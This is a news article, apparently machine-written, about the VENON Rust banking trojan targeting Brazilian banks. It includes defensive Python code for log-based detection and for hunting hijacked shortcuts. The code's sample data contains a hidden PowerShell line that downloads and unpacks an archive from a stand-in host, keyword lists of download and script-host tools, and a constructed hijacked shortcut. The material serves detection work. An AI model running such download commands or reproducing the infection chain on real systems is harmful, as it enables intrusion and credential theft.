

Ethical Hacking News

Rust-Based VENON Malware Targets 33 Brazilian Banks with Credential-Stealing Overlays




  • VENON is a Rust-based banking malware targeting financial institutions in Brazil, with capabilities that mirror the region's established banking trojans.
  • Its code structure suggests a developer familiar with existing Latin American banking trojans who used generative AI to rewrite and extend their functionality in Rust.
  • The infection chain relies on DLL side-loading; the DLL runs nine evasion techniques (anti-sandbox checks, indirect syscalls, ETW and AMSI bypasses among them) before doing anything malicious, and command-and-control runs over a WebSocket connection.
  • A remotely triggered uninstall step restores the hijacked shortcuts, letting the operator cover their tracks.
  • VENON targets 33 financial institutions and digital asset platforms in Brazil, stealing credentials with fake overlays whenever a targeted application or website is opened.



  • The Latin American cybercrime ecosystem has long produced banking malware aimed at financial institutions in Brazil. The latest addition is VENON, a Rust-based malware discovered by Brazilian cybersecurity company ZenoX.

    VENON stands out because it is written in Rust, whereas the region's well-known banking malware families are written in Delphi. Those Delphi-based families have long been associated with Latin American cybercrime groups; VENON is a more modern take on the same kind of threat.

    According to ZenoX, VENON exhibits behaviours consistent with established banking trojans targeting the region, such as Grandoreiro, Mekotio, and Coyote: banking overlay logic, active window monitoring, and a shortcut (LNK) hijacking mechanism. The overlap places VENON firmly in the lineage of Brazilian banking trojans rather than marking a wholly new technique.

    What sets VENON apart from its predecessors is the implementation language. Its code structure shows patterns suggesting a developer who is familiar with the capabilities of existing Latin American banking trojans but used generative AI to rewrite and expand those functionalities in Rust. For defenders this matters because detection content keyed to the Delphi families' code artefacts will not carry over to a Rust binary, even though the behaviour is largely the same.

    VENON is distributed by means of an infection chain that uses DLL side-loading to launch a malicious DLL. The campaign is suspected to leverage social engineering lures such as ClickFix, in which the victim is tricked into running a command themselves, to have them download a ZIP archive containing the payloads via a PowerShell script. Once the DLL is executed, it performs nine evasion techniques, including anti-sandbox checks, indirect syscalls, ETW bypass and AMSI bypass, before initiating any malicious action.

    The malware then reaches out to a Google Cloud Storage URL to retrieve a configuration, installs a scheduled task for persistence, and establishes a WebSocket connection to the command-and-control (C2) server. Two Visual Basic Script (VBS) blocks embedded in the DLL implement a shortcut hijacking mechanism that targets only the Itaú banking application.
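    The chain described in the two paragraphs above maps onto a handful of host telemetry events that can be checked independently and then correlated per host. The following added example (my own code, not ZenoX's analysis tooling or anything from the campaign) runs five rules over constructed Sysmon-style events; every path, file name, task name and URL in the sample data is an assumption made up for illustration, and the storage.googleapis.com hostname is assumed from the article's mention of Google Cloud Storage rather than taken from the report.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style events modelling the chain (not real telemetry from the campaign).
# Field names follow Sysmon's schema; every path, file name, task name and URL is invented.
SAMPLE_EVENTS = [
    # 1. ClickFix-style lure: explorer-spawned PowerShell fetches a ZIP and unpacks it under AppData
    {"EventID": 1, "Host": "ws01",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -w hidden -c "iwr https://example.invalid/u.zip -OutFile $env:TEMP\u.zip; '
                    r'Expand-Archive $env:TEMP\u.zip $env:APPDATA\Upd"'},
    # 2. DLL side-loading: an unsigned DLL loaded from the same user-writable folder as its host EXE
    {"EventID": 7, "Host": "ws01", "Image": r"C:\Users\ana\AppData\Roaming\Upd\viewer.exe",
     "ImageLoaded": r"C:\Users\ana\AppData\Roaming\Upd\version.dll", "Signed": "false"},
    # 3. Persistence: the side-loaded host registers a scheduled task
    {"EventID": 1, "Host": "ws01", "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Users\ana\AppData\Roaming\Upd\viewer.exe",
     "CommandLine": r'schtasks /create /sc onlogon /tn Upd /tr "C:\Users\ana\AppData\Roaming\Upd\viewer.exe"'},
    # 4. Shortcut hijack: a script host (not explorer.exe) rewrites a .lnk on the Desktop
    {"EventID": 11, "Host": "ws01", "Image": r"C:\Windows\System32\wscript.exe",
     "TargetFilename": r"C:\Users\ana\Desktop\Banco.lnk"},
    # 5. Config fetch: a non-browser in a user-writable folder resolves the Google Cloud Storage host
    {"EventID": 22, "Host": "ws01", "Image": r"C:\Users\ana\AppData\Roaming\Upd\viewer.exe",
     "QueryName": "storage.googleapis.com"},
    # Benign noise on another host; none of these should fire
    {"EventID": 1, "Host": "ws02", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell Get-Process"},
    {"EventID": 22, "Host": "ws02", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "QueryName": "storage.googleapis.com"},
    {"EventID": 11, "Host": "ws02", "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\bob\Desktop\Notes.lnk"},
]

# Folders an unprivileged user can write to; code executing from here deserves more scrutiny.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(users\\[^\\]+\\(appdata|downloads|desktop|documents)|users\\public|windows\\temp|programdata)\\",
    re.I)
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}


def base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def folder(path: str) -> str:
    return path.rsplit("\\", 1)[0].lower()


def rule_clickfix_powershell(e: dict) -> bool:
    """explorer.exe-spawned PowerShell that both downloads and unpacks an archive."""
    if e["EventID"] != 1 or base(e["Image"]) not in {"powershell.exe", "pwsh.exe"}:
        return False
    if base(e.get("ParentImage", "")) != "explorer.exe":
        return False
    cl = e.get("CommandLine", "").lower()
    fetch = any(k in cl for k in ("iwr ", "invoke-webrequest", "downloadfile", "start-bitstransfer"))
    unpack = "expand-archive" in cl or ".zip" in cl
    return fetch and unpack


def rule_dll_sideload(e: dict) -> bool:
    """Unsigned DLL loaded from a user-writable folder that also holds the loading EXE."""
    if e["EventID"] != 7:
        return False
    dll = e["ImageLoaded"]
    return (e.get("Signed", "").lower() == "false"
            and USER_WRITABLE.match(dll) is not None
            and folder(dll) == folder(e["Image"]))


def rule_scheduled_task(e: dict) -> bool:
    """schtasks /create launched by a process living in a user-writable folder."""
    return (e["EventID"] == 1 and base(e["Image"]) == "schtasks.exe"
            and "/create" in e.get("CommandLine", "").lower()
            and USER_WRITABLE.match(e.get("ParentImage", "")) is not None)


def rule_shortcut_tamper(e: dict) -> bool:
    """A .lnk written by anything other than explorer.exe (shortcut hijacking)."""
    return (e["EventID"] == 11 and e["TargetFilename"].lower().endswith(".lnk")
            and base(e["Image"]) != "explorer.exe")


def rule_cloud_storage_nonbrowser(e: dict) -> bool:
    """Non-browser process from a user-writable folder resolving the GCS host used for config."""
    return (e["EventID"] == 22 and e.get("QueryName", "").lower().endswith("storage.googleapis.com")
            and base(e["Image"]) not in BROWSERS and USER_WRITABLE.match(e["Image"]) is not None)


RULES = {
    "clickfix_powershell_fetch_unpack": rule_clickfix_powershell,
    "dll_sideload_user_writable": rule_dll_sideload,
    "scheduled_task_from_user_writable": rule_scheduled_task,
    "lnk_written_by_non_explorer": rule_shortcut_tamper,
    "gcs_lookup_by_non_browser": rule_cloud_storage_nonbrowser,
}


def triage(events: list) -> list:
    """Return (host, rule_name) for every event a rule matches."""
    return [(e["Host"], name) for e in events for name, rule in RULES.items() if rule(e)]


def escalate(events: list, min_stages: int = 3) -> dict:
    """Hosts where at least min_stages distinct chain stages fired; lone hits stay low-priority signals."""
    stages = defaultdict(set)
    for host, name in triage(events):
        stages[host].add(name)
    return {h: sorted(s) for h, s in stages.items() if len(s) >= min_stages}


if __name__ == "__main__":
    for host, name in triage(SAMPLE_EVENTS):
        print(f"{host}: {name}")
    print("escalate:", escalate(SAMPLE_EVENTS))
```

    Each rule on its own is noisy (PowerShell downloads, scheduled tasks and GCS lookups are all common in fleets), which is why escalate() only raises a host once several distinct stages have fired there; tune min_stages and the USER_WRITABLE folder list to the environment.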

    The attack also supports an uninstall step that undoes the modifications, suggesting that the operator can remotely restore the shortcuts to their original state to cover their tracks. For responders this means a clean-looking shortcut on a suspected host is not evidence that no tampering occurred.

    In all, VENON is equipped to target 33 financial institutions and digital asset platforms. It monitors the window title and the active browser domain and springs into action only when one of the targeted applications or websites is open, serving a fake overlay to harvest credentials.
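    The shortcut (LNK) hijacking described above is something responders can hunt for directly, because a rewritten shortcut still carries a parseable target. The following added example (my own code, not ZenoX's or anything from the malware) is a minimal MS-SHLLINK parser that pulls the target path and arguments out of a .lnk and flags shortcuts whose target drifted from a known baseline or now points a script host (wscript.exe, powershell.exe, and so on) at a script. The bank executable path, the VBS path and the build_lnk helper are assumptions used only to construct sample input offline; the page does not name the real shortcut targets.

```python
import struct
from pathlib import Path

# Shell Link header constants from MS-SHLLINK. build_lnk() below is a constructed, minimal .lnk
# generator used only to produce offline sample input for this example.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
(HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELPATH,
 HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE) = (1 << i for i in range(8))
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
                "cmd.exe", "mshta.exe", "rundll32.exe"}


def _cstr(data: bytes, off: int) -> str:
    """Null-terminated ANSI string at offset off."""
    return data[off:data.index(b"\0", off)].decode("cp1252")


def parse_lnk(data: bytes) -> dict:
    """Extract the resolved local target path and the StringData fields from a .lnk blob."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C                                  # end of the fixed-size ShellLinkHeader
    if flags & HAS_ID_LIST:                     # skip LinkTargetIDList: 2-byte size + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    target = None
    if flags & HAS_LINK_INFO:
        base = pos
        info_size, _hdr, info_flags, _vol, local_off, _net, suffix_off = struct.unpack_from("<7I", data, base)
        if info_flags & 1:                      # VolumeIDAndLocalBasePath: LocalBasePath + CommonPathSuffix
            target = _cstr(data, base + local_off) + _cstr(data, base + suffix_off)
        pos = base + info_size
    out = {"target": target}
    for flag, key in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                      (HAS_ARGS, "arguments"), (HAS_ICON, "icon")):
        if flags & flag:                        # StringData: 2-byte char count, then chars, no terminator
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            out[key] = data[pos:pos + count * width].decode("utf-16-le" if width == 2 else "cp1252")
            pos += count * width
    return out


def assess_shortcut(data: bytes, expected_target: str = "") -> dict:
    """Flag a shortcut whose target drifted from baseline or now points a script host at a script."""
    info = parse_lnk(data)
    target, args = info.get("target") or "", info.get("arguments", "")
    findings = []
    if expected_target and target.lower() != expected_target.lower():
        findings.append(f"target changed: {target!r} (expected {expected_target!r})")
    if target.rsplit("\\", 1)[-1].lower() in SCRIPT_HOSTS:
        findings.append(f"target is a script/command host: {target!r}")
    if any(tok in args.lower() for tok in (".vbs", ".js", ".ps1", ".bat", "-enc", "hidden")):
        findings.append(f"suspicious arguments: {args!r}")
    return {"target": target, "arguments": args, "findings": findings}


def hunt(folder: str) -> list:
    """Walk a folder (Desktop, Start Menu) and return the assessment of every flagged .lnk."""
    results = []
    for lnk in Path(folder).rglob("*.lnk"):
        r = assess_shortcut(lnk.read_bytes())
        if r["findings"]:
            results.append((str(lnk), r))
    return results


def build_lnk(target: str, arguments: str = "") -> bytes:
    """Constructed minimal .lnk: LinkInfo with a local base path plus optional Unicode arguments."""
    flags = HAS_LINK_INFO | IS_UNICODE | (HAS_ARGS if arguments else 0)
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack(
        "<IIQQQIIIHHII", flags, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    volume = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\0"   # VolumeID: fixed drive, empty label
    local = target.encode("cp1252") + b"\0"
    local_off = 0x1C + len(volume)
    suffix_off = local_off + len(local)
    link_info = struct.pack("<7I", suffix_off + 1, 0x1C, 1, 0x1C, local_off, 0, suffix_off)
    blob = header + link_info + volume + local + b"\0"
    if arguments:
        blob += struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    return blob


# Constructed samples (hypothetical paths): a clean shortcut and one rewritten to run a VBS via wscript.exe
EXPECTED = r"C:\Program Files\Bank\bank.exe"
CLEAN_LNK = build_lnk(EXPECTED)
HIJACKED_LNK = build_lnk(r"C:\Windows\System32\wscript.exe", r'"C:\Users\Public\update.vbs"')

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_LNK), ("hijacked", HIJACKED_LNK)):
        print(label, assess_shortcut(blob, EXPECTED))
```

    The parser only resolves targets recorded in LinkInfo as a local path; shortcuts to network shares or to shell namespace objects carry their target elsewhere and come back with an empty target, so treat a missing target as "inspect manually" rather than "clean". Pair hunt() with a baseline of expected targets per banking application to catch hijacks that use an innocuous-looking intermediate executable rather than a script host.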

    The discovery of VENON shows that established regional tradecraft is being ported to new languages and toolchains rather than replaced. Defenders should therefore key detections to behaviour, such as overlays, window monitoring, shortcut tampering and side-loaded DLLs, rather than to the artefacts of any one code base.

    Summary:
    The Rust-based malware VENON, discovered by Brazilian cybersecurity company ZenoX, targets 33 financial institutions and digital asset platforms in Brazil with credential-stealing overlays. Its use of Rust sets it apart from the region's Delphi-based banking malware families, and its infection chain combines DLL side-loading, nine evasion techniques, scheduled-task persistence, WebSocket C2 and a remotely reversible shortcut hijack aimed at the Itaú banking application.






    Related Information:
  • https://www.ethicalhackingnews.com/articles/Rust-Based-VENON-Malware-Targets-33-Brazilian-Banks-with-Credential-Stealing-Overlays-ehn.shtml

  • Published: Thu Mar 12 15:14:30 2026 by llama3.2 3B Q4_K_M

    © Ethical Hacking News . All rights reserved.

    Privacy | Terms of Use | Contact Us